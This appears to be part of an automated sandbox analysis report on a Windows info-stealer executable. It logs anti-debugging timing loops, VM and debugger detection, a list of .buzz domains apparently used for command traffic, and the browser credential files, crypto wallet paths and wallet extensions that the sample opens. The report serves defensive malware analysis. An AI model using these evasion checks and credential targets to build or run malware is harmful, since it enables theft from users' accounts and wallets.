                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B542 second address: 67B55C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57CD4ED04h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B55C second address: 67B560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6C5 second address: 67B6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6D0 second address: 67B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B6D4 second address: 67B6E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B825 second address: 67B86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C329h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC57C52C328h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jo 00007FC57C52C316h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B9E8 second address: 67B9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B9F1 second address: 67B9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC57C52C316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67BB3E second address: 67BB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC57CD4ECF6h 0x0000000a jp 00007FC57CD4ECF6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 jng 00007FC57CD4ECFEh 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67BCF2 second address: 67BCF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C74D second address: 67C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C756 second address: 67C75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C75A second address: 67C763 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67C763 second address: 67C77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57C52C31Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6807F8 second address: 680814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6804A8 second address: 6804E2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC57C52C316h 0x00000008 jmp 00007FC57C52C325h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FC57C52C31Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC57C52C31Dh 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 691836 second address: 69183C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 69183C second address: 691844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BA3 second address: 50F0BB1 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BB1 second address: 50F0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC57C52C31Dh 0x0000000a xor esi, 49887476h 0x00000010 jmp 00007FC57C52C321h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0BDC second address: 50F0C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC57CD4ED07h 0x00000009 xor si, 59AEh 0x0000000e jmp 00007FC57CD4ED09h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC57CD4ED00h 0x0000001a xor si, FB28h 0x0000001f jmp 00007FC57CD4ECFBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 7BEDCBB1h 0x00000031 mov al, 71h 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0C47 second address: 50F0C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0C4D second address: 50F0CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FC57CD4ECFEh 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 pushad 0x00000013 mov esi, 307C3693h 0x00000018 mov eax, 1F29A8EFh 0x0000001d popad 0x0000001e mov di, si 0x00000021 popad 0x00000022 test esi, esi 0x00000024 jmp 00007FC57CD4ECFEh 0x00000029 je 00007FC5EE5AC425h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC57CD4ED07h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 50F0CA7 second address: 50F0D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 jmp 00007FC57C52C31Eh 0x00000015 je 00007FC5EDDA1AD4h 0x0000001b pushad 0x0000001c jmp 00007FC57C52C31Eh 0x00000021 mov dl, cl 0x00000023 popad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007FC57C52C31Fh 0x0000002d pop ecx 0x0000002e mov al, bl 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 428AA5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 428B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 5C3DA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSpecial instruction interceptor: First address: 65A6AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1282Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1273Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWindow / User API: threadDelayed 1178Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 5580Thread sleep count: 76 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 5580Thread sleep time: -152076s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 2156Thread sleep count: 1282 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 2156Thread sleep time: -2565282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3620Thread sleep count: 1273 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3620Thread sleep time: -2547273s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 936Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 3220Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 4364Thread sleep count: 1178 > 30Jump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe TID: 4364Thread sleep time: -2357178s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: XM6cn2uNux.exe, 00000000.00000003.2341949856.0000000005A0A000.00000004.00000800.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.2340853000.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: kyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6n2X
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000002.3557025653.0000000001209000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550946850.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3495987703.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3551237344.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535643089.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3535241706.0000000001205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000002.3556878490.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3550405641.00000000011C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341077322.0000000005A5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: XM6cn2uNux.exe, 00000000.00000003.2341222241.0000000005A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: NTICE
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: SICE
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: hummskitnj.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: cashfuzysao.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: appliacnesot.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: screwamusresz.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: inherineau.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scentniej.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rebuildeso.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: prisonyfork.buzz
                Source: XM6cn2uNux.exe, 00000000.00000003.2174705388.0000000004F40000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mindhandru.buzz
                Source: XM6cn2uNux.exe, 00000000.00000002.3553291127.00000000005A3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: JProgram Manager
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: XM6cn2uNux.exe, XM6cn2uNux.exe, 00000000.00000003.3516130386.0000000001282000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3543248927.0000000001282000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3520973311.000000000122E000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516588604.000000000122D000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516546592.0000000001208000.00000004.00000020.00020000.00000000.sdmp, XM6cn2uNux.exe, 00000000.00000003.3516461851.0000000001205000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: XM6cn2uNux.exe PID: 5448, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: XM6cn2uNux.exe, 00000000.00000003.3492725287.0000000001231000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
                Source: XM6cn2uNux.exe, 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\walletsk
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: XM6cn2uNux.exe, 00000000.00000003.3492725287.0000000001231000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                Source: XM6cn2uNux.exe, 00000000.00000003.2776645299.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: XM6cn2uNux.exe, 00000000.00000003.3520918204.000000000125C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
                Source: XM6cn2uNux.exe String found in binary or memory: Wallets/Ethereum
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: XM6cn2uNux.exe, 00000000.00000003.3498309198.000000000125B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\XM6cn2uNux.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
